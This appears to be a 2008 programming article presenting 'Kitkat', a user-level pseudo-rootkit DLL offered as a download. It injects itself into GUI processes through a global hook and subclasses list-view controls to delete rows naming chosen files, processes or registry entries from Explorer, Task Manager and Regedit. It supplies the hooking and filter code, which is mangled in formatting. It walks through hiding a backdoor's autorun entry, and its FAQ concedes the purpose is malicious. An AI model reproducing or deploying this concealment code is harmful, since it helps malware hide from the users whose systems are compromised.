• Download Kitkat - 3.89 KB
• Download DllTester - 2.51 KB

Introduction

The Following Article is About Using Global Hooks and Window Subclassing to create a pseudo-Rootkit capable of hiding files from Explorer,Task Manager,Registry Editor,etc

Background

You must know basic C++. Windows Programming, Global Hooks (for dll injection). You Must ofcourse, Know what a RootKit is?

Disclaimer

Though The program is well tested i have to include this disclaimer. The Following Program Attempts to Modify your Operating System, which may/can make your system unstable. By Executing/Compiling The Program you agree that The author nor the site hosting this article shall not be held responsible for any damages occured due to the this program. This Program Comes with NO WARRANTY. USE AT YOUR OWN RISK!! If this scares you, you probably shouldn't run this Program. The Author Hereby disclaims himself. This article may not be re-published elsewhere without the permission of the author.

Using the code

Compile the VC++ Project to obtain a Dll. You could write your loader. But i have enclosed a Small Dll Tester Written in VB just incase. Once Loaded, the dll will establish a CallWnd Hook.

Theory

Ok, Before i start a flame war or before i get out-ed by Guru's out here, i'll like to state Kitkat is not a "System RootKit". It's More of a "User Rootkit" Not to be confused with "UserMode RootKits (Ring 3)"...

There are 2 Kinds of Rootkits

1. Kernel Mode Rootkits (Run in Ring0 and Filters Requests at highest level)
2. UserMode Rootkits (Runs in UserMode, uses API Redirection,IAT hooking to get the job done)

The Most Powerfull Rootkit's are no doubt The Kernel Rootkits. Usermode Rootkits are less desirable it is wellknown not all API calls can be hooked using IAT Patching. (Link to Article)

So Which one of these does KitKat Belong to? Actually, its None of them...

See, Most Rootkits have the following model

Collapse

        OS --->RootKit Filter --->User

Every File that is being stealthed is Hidden from the system itself...which means even if one programmatically tries to locate a file, You'll not be able to...since the filter intercepts such a request....
So effectively stealthing the files/processes from BOTH the SYSTEM and THE USER. If an AntiVirus requested a File that was being stealthed...The AV would've got an "INVALID_FILE_HANDLE"
but Kitkat's Model is based on the Following Model

Collapse

        Windows GUI ---->Kitkat RootKit Filter  ---->User

As You can see, The OS doesn't figure in the diagram...because Kitkat only modifies/affects the GUI of the System. KitKat Does NOT Stealth your Files From The System itself. It Only hides your files from the "User's Sight"....The Files can be read/written upon programmatically by any program.

For eg. Say Kitkat is hiding a file (c:/test.txt) though You won't be able to see the file using explorer.
If You tried to execute "notepad c:/test.txt" this would work fine...since the System can "SEE" the file.
The System remains unaffected, only the GUI is affected. So This Method can be used to

1. Hide Process Listing (from Task Manager,etc)
2. Hide Files in Explorer (Folders,Files, Common Dialog Boxes)
3. Hide Entries in Registry Editor (Regedit)

I Hope Your Getting this...

DLL injection

The Dll injection method is based of Ivo Ivanov's Code. A Million Thanks to Him. Search This Site For it.

Working

Grab your Trusty Spy++ and try to find out "the classname" for the Main Window (where folders and files are displayed) used by

1. Explorer.exe
2. Regedit.exe
3. Taskmgr.exe
4. Common Dialogs (Open File,Save File)
5. Etc (Pretty Much Everything on your PC)

You'll Notice all the Main Window (where folders and files are displayed) are of ClassName "SysListView32" which is popularly called a "ListView". Note, Almost Every Control in Windows is a window...They are all Created using "CreateWindow". Windows Differentiates Between a Button and a List by means of a Classname. And also Every Window has a Window Procedure.

For Each Class there are specific procedures...For a Button,The WM_COMMAND may simulate a depressed button. The same Message for a List simply highlights the selection...So you see, every Control have their own in-built default procedures...we are going to redirect this default procedure to our filter.

Kitkat.dll is going to be injected into Every Process that has a Message Queue (Using CallWnd Hook) Once Injected, Using Global Subclassing we are going to "redirect" the default window procedure of ListView to our Filter Function.

To Perform The Redirection we only need One API "SetClassLong".

Hooking The ListView Procedure

Collapse

 //
Create temporary SysListView32 window since you need an instance of that control for SetClassLongHWND hWnd = CreateWindow("
SysListView32"
,"
"
,0
, 0
, 0
, 0
, 0
,NULL, NULL, hInstance, NULL);OldWndProc = SetClassLong(hWnd,GCL_WNDPROC,(LONG)NewWndProc); //
get previous addrDestroyWindow(hWnd); //
destroy it, don't need it anymore

Once This is done, Every ListView Created AFTER the hook was established will be affected...

Note : ListViews Created Before are unaffected...Just One Of the Many Drawbacks of Kitkat Method. Although it can be implemented using SetWindowLong() we'll have to remember The Old Procedure For each one of them. Hey, This is just a demo.

Notice, we Got the OldWndProc. You Need to store this...we'll be needing this to call the real procedure.

Filter Function

Collapse

chartemp[MAX];LONG OldWndProc;LRESULT CALLBACK NewWndProc(HWND Hwnd, UINT Message, WPARAM wParam, LPARAM lParam){switch
(Message){//
Why Hook the WM_PAINT? Because it was the Only Common Message i found that //
 was sent to all "Explorer.exe","Regedit.exe", "taskmgr.exe"caseWM_PAINT://
Find Number of Columns...We'll Search Every ColummnHWND hdr = (HWND)SendMessage(Hwnd,LVM_GETHEADER,0
,0
);intCol = SendMessage(hdr,HDM_GETITEMCOUNT,0
,0
);Col++;inti,j,k,itemCount = ListView_GetItemCount(Hwnd);for
(i=0;i <Col;i++){for
(j=0;j <itemCount;j++){ListView_GetItemText(Hwnd,j,i,temp,MAX);strcpy(temp,_strlwr(temp));for
(k=0;k <UBOUND_PROCLIST;k++){//
substring searchif
(strstr(temp,procList[k])){ListView_DeleteItem(Hwnd,j);itemCount--;j--;}}}}break
;}returnCallWindowProc((WNDPROC)OldWndProc, Hwnd, Message, wParam, lParam);}

Summary

Now, ListView can Have Multiple Colummns...Let's Say I'm this evil malicious hacker dude, those guys at microsoft always seem to talking about, anyways, i have my "backdoor.exe" which has created a Autorun entry in the registry...Now, I want my entry to be hidden...

1. Inject Dll into Regedit.exe
2. Subclass SysListView32
3. Intercept WM_PAINT Message
4. Search Through ALL Columns and ALL ROWS to find "backdoor.exe"
5. If found delete that entire Row.
6. Call Default Procedure.

DrawBacks

1. Does not Affect Console Programs (coz they don't have Message Queue's)
2. Any Program can "detect" files, if we are actively looking for it. Assuming the user doesn't know he's been compromised. He'll never look for it.
3. Controls Created Prior to Hooking are unaffected.

FAQ

Q : Why WM_PAINT?
A : I tried to monitor all Messages that were sent to SysListView32, the only common Message that was sent to Explorer.exe,Taskmgr.exe,Regedit.exe was WM_PAINT. There are others, but they are not consistent with all Applications

Q : In Explorer, There's an Empty Space where the icon (for the stealthed file) was supposed to fall. What's with that?
A : I'm Guessing The positions are assigned before WM_PAINT is called...so when we filter the result...the space is already allocated for the icon. I Guess if we intercept any other message this could be fixed. but i haven't tried any.

Q : What is its Purpose?
A : Unfortunately, The only purpose i can tell you, involves malicious applications. But i hope something good can come out of it.

Q : Hey,I can see the Stealthed files using cmd. Can you Implement a Method that works for them?
A : It can be implemented...We'll have to Redirect "StdIn,StdOut,StdError" using Pipes but that's a story for another time. Who Knows, if i get the time i will...

Q : It Doesn't Work on my System?
A : As of now, i have tested it out on my System which is a Win2k SP4. If It doesn't work on your system please report it. So that the article can be corrected.

Q : It's a DLL, how do i execute it?
A : You could write your loader. But i have enclosed a Small Dll tester Written in VB just incase. Once Loaded, the dll will establish a CallWnd Hook. You can Customize it yourself...

Authors Notes

The Processes to Hide are hardcoded...To make it flexible you can use "ini" files to check filenames.
You can prevent the dll from injecting itself into certain process by matching g_exePath with filename (say "explorer.exe")
More Notes in the Source Code

History

17 Feb 08 : Original Draft

This article, along with any associated source code and files, is licensed underThe Code Project Open License (CPOL)